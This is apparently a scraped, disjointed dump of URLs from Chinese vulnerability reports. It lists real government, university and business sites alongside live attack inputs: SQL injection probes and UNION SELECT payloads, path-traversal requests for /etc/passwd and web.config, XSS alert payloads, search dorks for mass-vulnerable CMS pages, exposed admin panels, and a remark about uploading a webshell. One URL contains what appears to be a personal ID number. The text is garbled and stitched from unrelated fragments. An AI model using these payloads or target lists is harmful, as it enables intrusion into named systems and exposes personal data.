http://bjgcxx.baoji.gov.cn/list1.php?tid=1658&xm=%E5%B7%A5%E4%BD%9C%E5%8A%A8%E6%80%81&sid=15 http://bjgcxx.baoji.gov.cn/list1.php?tid=1658&x www.benq.com.cn http://www.benq.com.cn/support/drivers/?conf_name=monitor&prod_model=BL2201M,其中的conf_name参数可以被注射 http://mana.doladola.cn:8080/baidu100tv_admin/mgmt/login.action http://dwygb.nwnu.edu.cn/Index.php?g=Home&m=Content&a=index&t=Default&webid=26&id=1和 http://dwygb.nwnu.edu.cn/Index.php?g=Home&m=Article&a=index&t=Default&webid=26&id=28&channelid=31&articleid=6310和 http://ltgy.nwnu.edu.cn/list.php?fid=42和 
http://ltgy.nwnu.edu.cn/content.php?id=807和 http://zkzx.nwnu.edu.cn/zkcs/zkcs_show.php?zkcs_id=1 http://www.engl.polyu.edu.hk/Research_detail.php?recid=27和 http://www.engl.polyu.edu.hk/news_detail.php?newsid=68和 http://www.engl.polyu.edu.hk/Student_Community.php?newsid=5和 http://www.engl.polyu.edu.hk/ENGL_PROG.php?newsid=32 http://www.shop7z.com/demo/show_foot.asp?c_id=%2527 http://www.myhm.org/ http://www.myhm.org/rczx/SearchResult.asp?s_name=88952634 http://image.help.sdo.com/ http://image.help.sdo.com/admin.php?ctl=album&act=index http://image.help.sdo.com/admin.php?ctl=album&act=photos&album=187 http://image.help.sdo.com/admin.php?act=export&album=187&keyword= http://feedback.chinanews.com/ http://feedback.chinanews.com/ci/index.php,用户名和密码处都存在注入。root https://cxxjs.com/cgi-bin/login.cgi?action=log&fro=self# http://op.jlfzg.com:90/ebooking/ebookingAction!orderrequestEdit.action?selectorderrequestid=999977 http://www.315online.com/plus/ts_view.php?aid=10 http://www.315online.com/plus/ts_view.php?aid=10%27 http://www.315online.com/plus/ts_view.php?aid=111111 http://202.207.177.9/sjdr/xcj.aspx?xh=1 http://www.fjysgl.gov.cn/寻找注入点,http://www.fjysgl.gov.cn/orginfo/article_print.asp?showid=212 http://www.fjysgl.gov.cn/Admin_Login.aspx http://voc.sdo.com/uservoice.aspx http://voc.sdo.com:8013/index.aspx index.php/login/login http://wxd.baoji.gov.cn/news.php?category=12 http://wxd.baoji.gov.cn/admin/login.php http://42.96.149.96:7002/quhappyHotelSystem/sy.jsp http://pop.hengan.com/mail5/jilinbsc.nsf/MailFS/!OpenFrameSet http://189chuangyi.com/project/apply/baseinfo?projectId=541c764fe4b0278e7df0e22a http://zp.czinfo.net/chaxun.asp http://tuanwei.web.sdutcm.edu.cn/TeacherView.asp?id=18 inurl:news_info.asp?lb_id= http://www.xxxx.com/admin/index.asp http://www.hx-led.com.cn/news_info.asp?lb_id=13 www.dzhjckj.com/news_info.asp?lb_id=13 http://www.zhengbangfeed.com/news_info.asp?lb_id=13 http://www.drsjjpzs.com/news_info.asp?lb_id=172 www.fzdyj.net/news_info.asp?lb_id=22 
www.chinatht.com/news_info.asp?lb_id=80 www.tyay.com.cn/news_info.asp?lb_id=7 www.jlys-bj.com/news_info.asp?lb_id=45 www.sisetech.com/news_info.asp?lb_id=22 http://www.ncad.net.cn/news_info.asp?lb_id=87 http://www.sxdachang.com/rongyu.asp?erid=5 http://demo.magicwinmail.com:6080/ http://m.huxiu.com/profile.html http://www.yundaex.com/ www.yundaex.com loader:URLLoader http://www.yf1668.com/index.asp http://112.124.41.23:38888/ http://112.124.41.23:38888/Project/ProjectJinDu.aspx?ProjectName=A11111111%A1%AA%A1%AA%CF%EE%C4%BF%C3%FB%B3%C6 http://112.124.41.23:38888/Project/PingShen.aspx?ProjectName=A11111111%A1%AA%A1%AA%CF%EE%C4%BF%C3%FB%B3%C6% http://112.124.41.23:38888/Project/TuXingJinDu.aspx?ProjectName=A11111111%A1%AA%A1%AA%CF%EE%C4%BF%C3%FB%B3%C6 com.tuniu.app.ui/com.tuniu.app.MessageReceiver com.tuniu.app.ui/cn.jpush.android.ui.PushActivity com.tuniu.app.ui/com.tuniu.app.MessageReceiver site:img.y.sdo.com http://lenovobbs.lcf5.lenovo.com.cn/thread-126866-1-1.html http://xtoa.lbex.com.cn/os/1/index.aspx http://pan.baidu.com/s/1tUeQU http://www.4001961200.com/portal/GetSms.do” http://www.baidu.com/xxx.apk&mobilesendMax=999&permoilesendMax=5” http://www.4001961200.com/portal/VerifyCode” http://demo.magicwinmail.com:6080/ http://dianping.lenovo.com.cn/valuation/index.php/index/search?k=think http://dianping.lenovo.com.cn/valuation/index.php/index/search?k=think http://dianping.lenovo.com.cn/valuation/index.php/index/search?k=think http://dz.pm.comsenz-service.com/,人品爆发,discuz dz.pm.comsenz-service.com/]$ encap:Ethernet addr:10.0.6.5 Bcast:10.0.6.255 Mask:255.255.255.0 fe89:162b/64 Scope:Link MTU:1500 packets:6530950 packets:5091834 txqueuelen:1000 http://glpt.sxaj.gov.cn/Design/pages/YingMa/news/downfile.aspx?FilePath=~/upload/20120427/129799872737343750.doc http://glpt.sxaj.gov.cn/Design/pages/YingMa/news/downfile.aspx?FilePath=~/web.config http://wenwen.sogou.com/user/taHome?sp=SQQ http://wenwen.sogou.com/user/taHome?sp=S10001 
http://www.linkcloud.cn/cloudVm/buy/14 http://center.5i5j.com/managersection/managersectioninfo, http://center.5i5j.com/fangtoo/fangtoouserreg, http://cms.5i5j.com/admin/weituo/lottery/, http://cms.5i5j.com/admin/questionAdd/index/, http://www.bacic5i5j.com/admin/, http://cap.imooc.com/space/profile?uid=441076 http://cap.imooc.com/qa/280/order/1?textarea=&cid=%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cscript%3E http://cap.imooc.com/qa/292?textarea=&cid=%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cscript%3E http://my.xuan.news.cn/main.do http://demo.cuumall.com/index.php/home/detail/index?id=323 http://demo.cuumall.com/index.php/home/new/cxview/id/7 http://210.51.54.24/webmail/collect.xls http://www.tp.lydyyy.com.cn/View.asp?id=77 http://www.lysgzcx.hnloudi.gov.cn/lddqgzcx/gz_admin/login.asp http://www.gzcx.hnloudi.gov.cn/ldczgzxt/gz_admin/login.asp inurl:pubinfo/Moreysxk.asp?Qryqyxmbm http://www.tfxfdc.com/pubinfo/HouseSource.asp?forsearch=1 http://www.yafcj.com/pubinfo/HouseSource.asp?forsearch=1 http://www.jsxfgj.com//pubinfo/HouseSource.asp?forsearch=1 http://www.szfcsc.com/web/pubinfo/HouseSource.asp?forsearch=1 http://www.essfdc.gov.cn/pubinfo/HouseSource.asp?forsearch=1 http://www.szfcsc.com/web http://www.tmfdc.gov.cn/ http://www.hsfdc.com/web1 http://www.xnfcj.com/ http://www.jsxfgj.com/ http://www.eszfdc.gov.cn/ http://www.yxxfgj.com/ http://www.jcsfdc.com.cn http://www.yafcj.com http://www.tfxfdc.com http://www.ahjjjc.gov.cn/zwgk_msg.php?MsgId=96055 http://www.szsjw.gov.cn/zwgk_msg.php?MsgId=62295 http://www.tgsqjjjc.gov.cn/zwgk_msg.php?MsgId=65301 http://www.fcjjjc.gov.cn/zwgk_msg.php?MsgId=21632 http://www.mcjjjc.gov.cn/zwgk_msg.php?MsgId=80108 http://www.tljqjw.gov.cn/zwgk_msg.php?MsgId=59050 http://www.yqjjjc.gov.cn/zwgk_msg.php?MsgId=32445 http://www.wwjjjc.gov.cn/zwgk_msg.php?MsgId=32445 http://www.qmjjjc.gov.cn/zwgk_msg.php?MsgId=81281 http://www.fyyqjjjc.gov.cn/zwgk_msg.php?MsgId=37254 
http://www.hslz.gov.cn/zwgk_msg.php?MsgId=32445 http://www.qcjjjc.gov.cn/zwgk_msg.php?MsgId=32445 http://cphi.chinacdc.cn/wz_02/to_index.ac http://www.huafi.com/ http://www.hnaf120.com/admin/login.aspx http://www.meigedianqi.com/admin/login.aspx http://www.wenjiao.cn/admin/login.aspx http://www.dextt.com/admin/login.aspx http://www.hfxseeds.com/admin/login.aspx http://www.shdrb.com/admin/login.aspx http://www.jckmgs.com/admin/login.aspx http://www.yfntsb.com/admin/login.aspx http://www.hggfj.com/admin/login.aspx http://www.runhe168.com/admin/login.aspx http://www.zzxfdz.com/admin/login.aspx http://www.bst-dz.com/admin/login.aspx http://www.zgfywh.com/admin/login.aspx http://zzdhcq.com/admin/login.aspx http://www.xiangyuanmenye.com/admin/login.aspx http://www.hnsxyt.com/admin/login.aspx http://www.shilifujian.com/admin/login.aspx http://www.zzmxkt.com/admin/login.aspx http://www.greehn.com.cn/admin/login.aspx http://www.huafi.cn/admin/login.aspx http://www.hgblower.com/admin/login.aspx http://www.hnaf120.com/admin/login.aspx http://thinkbbs.lenovo.com.cn/thread-126866-1-1.html http://drops.wooyun.org/papers/1383 http://www.sgin.cn/ inurl:abouts.php?id= http://www.xxxx.com/sgin/index.php http://www.attagems.com/abouts.php?id=9 http://www.hefna.net/abouts.php?id=9&aw=2 http://www.jgjzx.net/abouts.php?id=11&aw=1 http://www.knjkc.com/abouts.php?id=9&PHPSESSID=8ef8sqvl5a0otve5ij3jmg5077 http://www.gzawt.com/abouts.php?id=1 http://www.gzyzys.com/abouts.php?id=9&aw=1 http://www.gdgj13.com/abouts.php?id=10 http://changningwuliu.com/abouts.php?id=9 http://www.gztopde.com/abouts.php?id=12 http://www.mofonail.com/abouts.php?id=10&aw=1 http://www.gzjixian.com/abouts.php?id=10&aw=1 http://www.gzchemeida.com/abouts.php?id=10 http://www.youshun168.com/abouts.php?id=8 http://www.ouqier.com.cn/abouts.php?id=14 http://www.aoyangshebei.com/abouts.php?id=10 http://www.chuangzhi1688.com.cn/abouts.php?id=10&aw=3 http://sanyi-light.com/abouts.php?id=9 
http://holy-gkids.com/abouts.php?id=14 http://www.gintec.cn/abouts.php?id=9&aw=1 http://好理吉.com/abouts.php?id=12&aw=1 http://zivvi.com.cn/wap/abouts.php?id=9 http://www.befxc.com/abouts.php?id=10 http://www.zh-xin.com/abouts.php?id=8 http://www.yipinxuangz.com/abouts.php?id=2 http://gdbeiqi.com/abouts.php?id=10 http://www.fayuhair.com/abouts.php?id=10 http://a1616358.sn20.gzonet.com/abouts.php?id=13 http://www.gzchuanli.com/abouts.php?id=9 http://gzflard.com/abouts.php?id=12 http://www.gzflard.com/abouts.php?id=10 http://jinglingrui.com/abouts.php?id=13 http://www.ekbio.cn/abouts.php?id=13 http://www.ronxinmachine.com.cn/abouts.php?id=1 http://www.gzruian.cn/abouts.php?id=5 http://yxtech.com.cn/abouts.php?id=11 http://www.chaldylan.com/abouts.php?id=13&aw=2 http://www.whwebsite.com/ inurl:About.aspx http://www.whhelmet.com/admin/Login.aspx http://www.qdzxy.com/keshi/keshi_view.aspx?id=7 http://202.102.41.12:8180/uc_server/ http://sc29.scut.edu.cn/ http://cs.hn96531.com/ http://cs.hn96531.com/manage/login/login.aspx http://cs.hn96531.com/manage/setting/ http://cs.hn96531.com/UC/这个目录,由于可以列目录所以轻松找到了文件上传页面(http://cs.hn96531.com/UC/c_fileUpload/Demo.aspx)。由于没有设置过滤所以轻松上传webshell。 http://waiqin.gdbnet.cn/LecManager/index,如图所示: http://www.mytaoyuan.com/ http://file.geely.com/ http://www.601.cn/taoyuan/ http://down.shinning.com.cn/ http://wx.jxqunli.com.cn/ http://sce.bda.edu.cn/ http://admin.yc22.com/ http://qydoc.yunip.com/ http://www2.miachina.cn/ http://doc.shslzx.cn/ http://www.xp6.net/ http://file.cnivs.com/ http://www.dycoal.cn/qydoc/ http://u.im906.com/ http://m.mop.com:80/ http://oa.fj.bnet.cn/oa/homepage/index_prod_intro.jsp http://oa.fj.bnet.cn/oa/homepage/index_prod_sample.jsp http://oa.fj.bnet.cn/oa/homepage/index.jsp http://www.ahomehotel.com:8081/oa/login.jsp http://hlbg.flylong.com.cn:8081/oa/login.jsp http://61.131.50.27:8081/oa/login.jsp http://oa.doone.com.cn/oa/login.jsp http://220.161.217.98:8082/oa/login.jsp http://222.77.67.205:8080/oa/login.jsp 
http://222.77.63.70:8081/oa/login.jsp http://218.66.159.28:8081/oa/login.jsp http://202.101.116.81/oa/login.jsp http://office.homeinns.com/hcs/login.aspx WWW.BAIXING.COM https://github.com/Acse/dandelion/blob/d1dbbeeebdb61fd8ae9557daca1d013dbc6c26f4/dandelion/application/library/Common/Email/Email.php https://github.com/90caoxu/commons/blob/ce2d8b602635aa0a25aa7821e2fab42c09c05526/src/main/java/com/lycos/commons/utils/Email.java http://zdjyxy.sysu.edu.cn,结果发现主页有后台管理登陆入口 http://xy.cmsproxy.sysu.edu.cn/cms/index.jsp http://sznews.zjol.com.cn/tgxt/ http://sznews.zjol.com.cn/tgxt/Web.config http://sznews.zjol.com.cn/tgxt/admin.aspx.cs http://sznews.zjol.com.cn/tgxt/index.aspx.cs http://sznews.zjol.com.cn/sznews/dxbbs8-access/Dxbbs8.aspx http://sznews.zjol.com.cn/sznews/dxbbs8-access/Forum.config https://code.google.com/p/chromium/issues/detail?id=143439 http://pinyin.sogou.com/dict/ywz/ajax/make_dict.php http://info.buynow.com.cn/Food/ShowDetail.aspx?id=67999&shopID=1071 http://novel.mse.sogou.com/catalog/action.php?c=../../../../../../../../../../etc/passwd%00.jpg&m=get&refer=latest&sogouid= http://novel.mse.sogou.com/catalog/action.php?c=../css/base.css%00.jpg&m=get&refer=latest&sogouid= http://www.1caitong.com/ http://www.qlszb.com/custom/CompanyCGList.aspx?ComId=1 http://zzhz1.zjol.com.cn/faq/ http://xsc.sdjzu.edu.cn/sms/manager/ http://xsc.sdjzu.edu.cn/sms/manager/excel/ http://wooyun.org/bugs/wooyun-2010-075231 http://it.homeinns.com/ito_beta/Search/Search.aspx http://w3m.huawei.com/m/servlet/index http://205.177.226.128:8080/asynchPeople/ http://jf.10086.cn/portal/user/web/UserAccountAction?action=saveAddress http://222.240.133.53:8080/dpmis/ https://github.com/badwtg1111/mymutt/blob/0008783c4d96176dae9324ccd6b741f89555ebb5/.msmtprc http://nx.bbn.com.cn/dgpt/list.php?type=2 http://shouji.sogou.com/wap/app/ajax.php?skin_id=0 http://119.39.124.142:10010/system/systemmain.aspx https://61.178.12.30/ https://61.178.20.170/ http://www.exploit-db.com/exploits/14884/ 
http://112.83.255.228:9999 facetime:IcanCallU@good.com http://course.fafu.edu.cn/youcha/login.asp http://59.79.230.99/wsbz/ http://202.205.91.108/fjnlzp/showPolicyBulletinDetail.php?type=3&id=16 http://course.fafu.edu.cn/nfsb/login.asp http://course.fafu.edu.cn/lxsyzx/login.asp http://210.34.80.123/webquery/ http://xccbank.com/admin http://xccbank.com/phpmyadmin/ inurl:Login.aspx?Role=author http://fzxb.nenu.edu.cn/Login.aspx?Role=author http://heuxb.hrbeu.edu.cn/Login.aspx?Role=author http://qhxb.lib.tsinghua.edu.cn/Login.aspx?Role=author http://ndxbskb.imu.edu.cn/Login.aspx?Role=author http://www.xsdxbzk.com/Login.aspx?Role=author http://www.yxyjsxb.com/Login.aspx?Role=author http://journalrw.nbu.edu.cn/Login.aspx?Role=author http://njsfdxzrb.paperonce.org/Login.aspx?Role=author http://trxyxb.gztrc.edu.cn/Login.aspx?Role=author http://xbzrb1.henu.edu.cn/Login.aspx?Role=author http://www.chinatelecomiot.com http://www.samsoncn.com/ http://www.samsoncn.com/product/Customers.aspx http://www.qhda.gov.cn/platformData/infoplat/pub/qhdaweb_2662/include_page/down.jsp?downpath=../../../../index.jsp http://sh.119.gov.cn/infoplat/platformData/infoplat/pub/xiaofang_2542/docs/201012/res_show/include_page/down.jsp?downpath=../../../../../index.jsp http://www.yxarchive.gov.cn/yxdaweb/platformData/infoplat/pub/yxdaweb_2532/include_page/down.jsp?downpath=../../../../index.jsp http://daj.xinxiang.gov.cn/xxdaweb/platformData/infoplat/pub/xxdaweb_32/include_page/down.jsp?downpath=../../../../index.jsp http://221.232.141.109/ http://221.232.141.109/login2.asp http://club.suning.com/forum.php?mod=viewthread&tid=2228206&page=1&extra=#pid29908324 http://szuhr.szu.edu.cn/idxNewsView.asp?nID=190 http://jingpin.szu.edu.cn/arts/teachdetail.asp?ProductId=223 http://www.essfdc.gov.cn/PubInfo/lpxx.asp?qyxmbm=DBDHDBDHDADADDDGDDDBDCDJ000001 http://www.xnfcj.com/PubInfo/lpxx.asp?qyxmbm=DBDHDADCDADADHDGDDDBDCDB000004 http://www.hsfdc.com/web/Pubinfo/lpxx.asp?qyxmbm=DBDHDADCDADADGDEDDDBDCDE000002 
http://www.szfcsc.com/web/PubInfo/lpxx.asp?qyxmbm=DBDHDADCDADADCDEDDDBDCDI000001 http://www.tmfdc.gov.cn/pubinfo/lpxx.asp?qyxmbm=DBDHDADCDADADCDIDDDBDCDE000001 http://www.hgfgj.com:7201/PubInfo/lpxx.asp?qyxmbm=DBDHDADCDADADHDCDDDBDCDF000001 http://www.jsxfgj.com/PubInfo/lpxx.asp?qyxmbm=DBDHDADCDADADADEDDDBDCDA000001 http://www.ltxfdc.com/pubinfo/lpxx.asp?qyxmbm=DBDHDADCDADADBDBDDDBDCDC000001 http://www.yxxfgj.com/pubinfo/lpxx.asp?qyxmbm=DBDHDADCDADADCDDDDDBDCDJ000001 http://www.yafcj.com/PubInfo/lpxx.asp?qyxmbm=DBDHDADCDADADADDDDDBDCDB000003 http://www.dyfdc.net.cn/pubinfo/lpxx.asp?qyxmbm=DBDHDADCDADADEDBDDDBDCDJ000002 http://www.haxfdc.com/web/pubinfo/lpxx.asp?qyxmbm=DBDHDADCDADADADHDDDBDCDH000001 http://jingpin.szu.edu.cn/jingpin2008/wuliu/news.asp?id=84 www.docer.com是不是他的新版本啊),发现不少好模板,那咱就找找吧。 http://docer.wps.cn/threadview/wdid-205895.htm http://wdl1.cache.wps.cn/wps/cdnwps/upload/official/template/2014-9-11/5411436c45134.ppt http://img2.template.cache.wps.cn/wps/cdnwps/upload/official/preview//vip/2013-9-17/5238197f1b133_1.jpg http://wdl1.cache.wps.cn/wps/cdnwps/upload/official/template2013-9-17/5238197f1b133.dpt http://wdl1.cache.wps.cn/wps/cdnwps/upload/official/template/vip/2013-9-17/5238197f1b133.dpt http://www.cdjcy.gov.cn/ http://125.71.206.32:8082/WSJB/WSJBApply.aspx?dwbm=510100 inurl:information.jsp?xmid= http://ahfp.ah.gov.cn/information.jsp?xmid=1316%20and%201=2 http://ahfp.ah.gov.cn/information.jsp?xmid=1316%20and%201=1 http://ahzhgzjb.ahpc.gov.cn:8080/information.jsp?xmid=2903%20and%201=2 http://ahzhgzjb.ahpc.gov.cn:8080/information.jsp?xmid=2903%20and%201=1 http://861.ahpc.gov.cn:9090/ahjjyj/information.jsp?xmid=4236%20and%201=2 http://861.ahpc.gov.cn:9090/ahjjyj/information.jsp?xmid=4236%20and%201=1 http://220.178.99.139:9090/ahjjyj/information.jsp?xmid=4446%20and%201=2 http://220.178.99.139:9090/ahjjyj/information.jsp?xmid=4446%20and%201=1 http://61.191.20.186:8080/ahdrcoa/information.jsp?xmid=724%20and%201=2 
http://61.191.20.186:8080/ahdrcoa/information.jsp?xmid=724%20and%201=1 http://www.u-mh.com/MyAdmin/Main.php http://www.waimai.meituan.com/comment/5192 www.ssap.com.cn/SKWX/XueShu/XueShu_SearchInfo.aspx?searchText=asd&channelId=10029 www.ssap.com.cn/SKWX/XueShu/XueShu_SearchInfo.aspx?se http://sqlmap.org http://uqwk.com/utility/convert/index.php https://url/base/sys/download_bak.php https://url/base/include/download.php?filename=mysql_data.sql.gz&path=/opt/ https://url/base/include/download.php?filename=要下载的文件名&path=文件路径 https://222.92.15.100/base/login/login.php https://angelic.com.cn/base/login/login.php http://121.30.232.54:9080/ycportal/jsp/AD/ADupdate.jsp?flag=update&checkbox_id=85 http://etungtech.com.cn/ http://www.etungtech.com.cn/solution.aspx?CateId=51&BaseInfoCateId=51 intitle:WEBLED信息发布管理系统 http://www.listentech.com.cn/(灵信科技)为例,struts执行漏洞 http://envi.ruc.edu.cn/newcn/ http://www.viewgood.cn/channels/4.html)给出的案例包含: http://www.qiye.org.cn/)开发的某套CMS程序用于多数网站,并且存在同一注入漏洞 http://ahjinf.com/news_show.php?cat_pid=2&cat_id=15&art_id=66 http://www.ahjinf.com/news_show.php?cat_pid=2&cat_id=15&art_id=63 http://www.ahswhg.cn/news_show.php?cat_pid=7&cat_id=13&art_id=3959 http://sflff.w400.zhujichina.com/news_show.php?cat_pid=5&art_id=558&cat_id=27 http://www.shahejiuye.com/news_show.php?cat_pid=3&cat_id=20&art_id=377 http://www.xinruigroup.com.cn/news_show.php?cat_pid=2&cat_id=33&art_id=261 http://www.ahyanhu.cn/news_show.php?cat_pid=2&cat_id=12&art_id=255 http://www.ahamf.com/news_show.php?cat_pid=2&cat_id=10&art_id=4 http://www.hf-sf.cn/news_show.php?cat_pid=2&cat_id=16&art_id=674 http://龙桥矿业.中国/news_show.php?cat_pid=2&cat_id=16&art_id=323 http://www.cnfubang.com/news_show.php?cat_pid=2&cat_id=17&art_id=8 http://www.banlanherb.com/news_show.php?cat_pid=4&cat_id=16&art_id=163 http://www.ahswzk.com/news_show.php?cat_pid=3&cat_id=12&art_id=246 http://www.jljt.cc/news_show.php?cat_pid=5&cat_id=23&art_id=64 http://www.lqky.cn/news_show.php?cat_id=36&cat_pid=4&art_id=337 
http://www.ahlh88.cn/news_show.php?cat_pid=3&cat_id=7&art_id=81 http://www.新中建.com/news_show.php?cat_pid=2&cat_id=10&art_id=4 http://www.龙桥矿业.com/news_show.php?cat_pid=2&cat_id=14&art_id=219 http://敏欣电器.com/news_show.php?cat_pid=4&cat_id=12&art_id=14 http://tianzhugg.com/news_show.php?cat_pid=2&cat_id=15&art_id=33 http://ahjzsm.cn/news_show.php?cat_pid=2&cat_id=19&art_id=41 http://www.zhongligroup.cn/news_show.php?cat_pid=2&cat_id=15&art_id=178 http://www.jinleijituan.com/news_show.php?cat_pid=6&cat_id=27&art_id=67 http://www.talw.com.cn/news_show.php?cat_pid=2&cat_id=14&art_id=57 http://yingjia.tm/news_show.php?cat_pid=6&cat_id=36&art_id=1263 http://jinleijituan.com.cn/news_show.php?cat_pid=5&cat_id=23&art_id=51 http://www.ahmxdq.com.cn/news_show.php?cat_pid=4&cat_id=11&art_id=3 http://www.liyouit.com/ http://www.casc16.cn/showarticle.php?aid=208 http://www.shanxiyinkuang.com/showarticle.php?aid=29 http://www.zt25jxb.com/showarticle.php?aid=406 http://www.051jd.com/showarticle.php?aid=293 http://www.crecgwm.com/showarticle.php?aid=4067 http://www.sx8j.com/showarticle.php?aid=360 http://www.ch-westernbuildingdesign.com/showarticle.php?aid=176 http://www.sx-jz.com.cn/showarticle.php?aid=381 http://www.linpeils.com/showarticle.php?aid=173 http://www.shanxihangkong.com/showarticle.php?aid=317 http://www.yzgdcm.cn/page.php?id=11 https://***.chinacache.net/index.jsp http://www.oss.org.cn http://yp.oss.org.cn/software/show_demo.php?sw_id=155&demo_no=1 http://norc.szu.edu.cn:8080/college/teacher.asp?ID=300 http://www.51mike.com/pages/login/login.jsp?from=app&RSRU=http://www.51mike.com/ http://m.cndns.com:80/ http://m.cndns.com/default.aspx http://old.chinacourt.org/zhuanti1/yinglie/area.php?area_id=C%27%20and%20%271%27=%271 http://old.chinacourt.org/zhuanti1/yinglie/area.php?area_id=C%27%20and%20%271%27=%272 http://old.chinacourt.org/zhuanti1/yinglie/person.php?info_id=8%27%20and%20%271%27=%271 
http://old.chinacourt.org/zhuanti1/yinglie/person.php?info_id=8%27%20and%20%271%27=%272 www.zjsxjt.gov.cn/portal/article_list_zzjg.jsp?catalog_id=20070319000056 http://gzmis.jtfb.gov.cn:7001/console/ http://www.9wee.com/index.php?ac=selvote&app_id=102%20AND%203*2*1%3d6%20AND%2060%3d61&ctl=game&random=0.9856553943827748 https://183.224.236.27:8443/ims/html/index.jsp http://www.jszg.cq.cn/Jg.Asp?ID=22 http://www.jsjtw.gov.cn//plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user http://www.jsjtw.gov.cn/admin_beta/login.asp http://www3.gxu.edu.cn/jjjch http://cn-admin.longtugame.com/c-other_support/reply?qid=10432 https://58.48.109.231 http://218.16.125.98:8081/Ftp/Pic/2014-10/ http://218.16.125.98:8081/Ftp/Pic/2014-08/2014-08-29/769956/ http://218.16.125.98:8081/Ftp/Pic/2014-08/2014-08-29/ http://218.16.125.98:8081/Ftp/Pic/2014-09/ http://218.16.125.98:8081/Ftp/Pic/2014-10/ http://www.sdgem.gov.cn/Article_Class2.asp?ClassID=48 www.invest-zibo.gov.cn:7080/jmx-console/wuyun.txt http://zjshyj.zjwater.gov.cn/SJXLY/userLogin.aspx http://www.slssoft.com/ http://baike.baidu.com/view/5222614.htm?fr=aladdin http://oa.isoffice.cn/ http://www.slssoft.com/Web/Index/WebDetail/customer http://oa.isoffice.cn/syssetinfo/statusrecordpage.aspx?userid=test http://www.dianyingtongji.cn/Common/getdate.asp?datasp=asd%22/%3E%3Cbody/onload=alert%281%29%3E http://www.dianyingtongji.cn/hy_index/notify.asp http://xj.wenweipo.com/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=2%20union%20%20%20select%201,2,3,4,5,user%28%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23 http://platform.enavi.118114.cn:8081/TYCountProject/ http://platform.enavi.118114.cn:8081/TYCountProject/MobileAction?action=select http://platform.enavi.118114.cn:8081/TYCountProject/mobile/edit.jsp?index=5 www.tiandy.com www1.tiandy.com www2.tiandy.com http://www.tiandy.com/index.php/Society/show/?sid=24 
http://cee.xmu.edu.cn http://cee.xmu.edu.cn/admin/AdminLogin.aspx http://www.zoheng.net/)开发的某套CMS程序用于多数网站,并且存在同一注入漏洞 inurl:Message.php http://www.dingor.cn/Message.php?ac=MsgSave http://www.ahtiansen.com/Message.php?ac=MsgSave http://www.ahxz.com.cn/Message.php?ac=MsgSave http://www.ys-machine.com/Message.php?ac=MsgSave http://www.jiaxinmed.com/En/Message.php?ac=MsgSave http://www.tcluqiao.com/Message.php?ac=MsgSave http://www.ahlsjt.com/Message.php?ac=MsgSave http://www.tcdbzx.com/Message.php?ac=MsgSave http://www.tcslj.gov.cn/Message.php?ac=MsgSave http://www.jm-88.com/Message.php?ac=MsgSave http://www.ahzhichuan.com/Message.php?ac=MsgSave http://www.ahccm.com/Message.php?ac=MsgSave http://www.cn-yf.com/Message.php?ac=MsgSave http://www.djjshg.com/Message.php?ac=MsgSave http://www.tcedz.gov.cn/Message.php?ac=MsgSave http://www.longteng.gov.cn/message.php?ac=MsgSave http://www.jsqingqing.com/Message.php?ac=MsgSave http://www.ahguangyuan.com/Message.php?ac=MsgSave http://www.ahopty.com/Message.php?ac=MsgSave http://www.ahtc119.com/Message.php?ac=MsgSave http://www.ahhyym.com/Message.php?ac=MsgSave http://server1.cdce.cn http://server1.cdce.cn/student/login/RegisterAppeal.aspx?studentnumber=13208110129051&CrtificateNumber=430527199110124249&NetSchoolID=49 http://adm.anjuke.com/login.action http://optools.anjuke.com/哦 http://dwxy.hfut.edu.cn/jgszfl.php?nid=295 http://www.lshrss.gov.cn/ask/search.asp http://www.sq123.net.cn/ inurl:newsdisp.asp http://www.hzgs.gov.cn/ZWGK/zfxx/zfxi/SmallClass.asp?BigClassName=%CA%D0%BE%D6&SmallClassName=%CA%D0%BE%D6%27+and+%27f%27%3D%27f http://www.tcl.com/Investors/investorslist.html?tid=1 http://lighting.tcl.com/cn/news-d.aspx?ID=410&SortID=80 http://battery.tcl.com/read_job.php?id=38 http://www.tcl.com/Investors/investorslist.html?tid=1 http://www.izhancms.com/ http://demo9.izhancms.com/category/Category/list/cid/4伪静态?果断还原,如下:http://demo9.izhancms.com/category/Category/list?cid=4 
http://demo9.izhancms.com/category/Category/list?cid=4%20%29%20UNION%20ALL%20SELECT%201,2,3,4,5,6,CONCAT%280x23,DATABASE%28%29,0x23%29,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23 http://www.nbzytech.com/)开发的某套CMS程序用于多数网站,遗漏了一个注入。 http://www.pinnacles.cc/cn/products.php?tid=3 http://www.china-south.net/cn/products.php?tid=15 http://www.angricht.com/cn/products.php?tid=54 http://www.beifa.com/cn/products.php?tid=98 http://www.chinafirs.com/products.php?tid=1 http://www.mamabebe.cn/cn/products.php?tid=8 http://www.cn-moeller.com/cn/products.php?tid=14 http://www.3wen365.com/cn/products.php?tid=25 http://www.yourlonglighting.com/cn/products.php?tid=39 http://www.blxinyu.com/products.php?tid=4 http://www.austinelec.com/cn/products.php?tid=9 http://www.nbopen.net/products.php?tid=30 http://www.nbxjqd.com/cn/products.php?tid=1 http://www.jinhenglihe.com/products.php?tid=36 http://www.nbbhqy.com/cn/products.php?tid=2&page=2 http://www.nbxxmc.com/cn/products.php?tid=3 http://www.nbyuandian.com/cn/products.php?tid=3 http://www.nbnyjx.com/products.php?tid=17 http://www.xishisw.com/cn/products.php?tid=2 http://test.nbzytech.com/hongxuan/cn/products.php?tid=3&page=3 http://www.cicidz.com/cn/products.php?tid=5 http://www.shengyate.com/cn/products.php?tid=30 http://www.nbxhjd.com/products.php?tid=8 http://www.nbgfsg.com/cn/products.php?tid=1 http://www.npjet.com/products.php?tid=2 http://www.nbmkty.com/cn/products.php?tid=11 http://www.nbdayue.com/cn/products.php?tid=3 http://www.nbqhhl.com/cn/products.php?tid=5 http://www.krosor.com/cn/products.php?tid=8 http://116.255.234.15 http://soft0371.com/ http://116.255.234.15:8080/ http://dg.uninx.com:8481/cms/cms_iindex.php http://www.xianglianai.cn/)旗下的“找对象”这款app下载量居然第一,比第二名世纪佳缘多一倍多。是我好久没上网找过对象out了么? 
